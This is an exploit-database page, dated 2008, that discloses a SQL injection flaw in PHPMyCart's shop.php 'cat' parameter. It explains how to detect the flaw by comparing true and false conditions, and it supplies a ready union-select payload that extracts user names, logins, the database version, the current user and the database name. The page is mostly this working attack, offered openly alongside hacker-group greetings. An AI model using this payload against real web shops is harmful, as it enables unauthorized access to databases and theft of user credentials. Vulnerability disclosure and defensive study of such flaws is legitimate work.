PHPMyCart (shop.php cat) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHPMyCart (shop.php cat) Remote SQL Injection Vulnerability
# Published : 2008-06-14
# Author : n/a
# Previous Title : Family Connections CMS 1.4 Multiple Remote SQL Injection Vulnerabilities
# Next Title : Shoutcast Admin Panel 2.0 (page) Local File Inclusion Vulnerability

######################
#
#PHPMyCart Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
##
###
##
#
#Script suffers from a not correctly verified category id variable which is used in SQL Querys.
#An Attacker can easily get sensitive information from the database by
#injecting unexpected SQL Querys.
#
#We dont get any SQL Errors when the Injection Query appear to be false.
#However we have to look for content changing when we inject.
#Look at AND 1=1/AND 1=0
#All rows are echoed on the left side.
#
#SQL Injection:
#http://[target]/[path]/shop.php?cat=[SQL]
#
#PoC:
#shop.php?cat=2%20and%201=0%20union%20select%201,concat(name,0x3a,login,0x3a,@@VERSION,0x3a,user(),0x3a,database())%20from%20user
#
#######################
#
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team!
#
#######################
####################### 

# www.Syue.com [2008-06-14]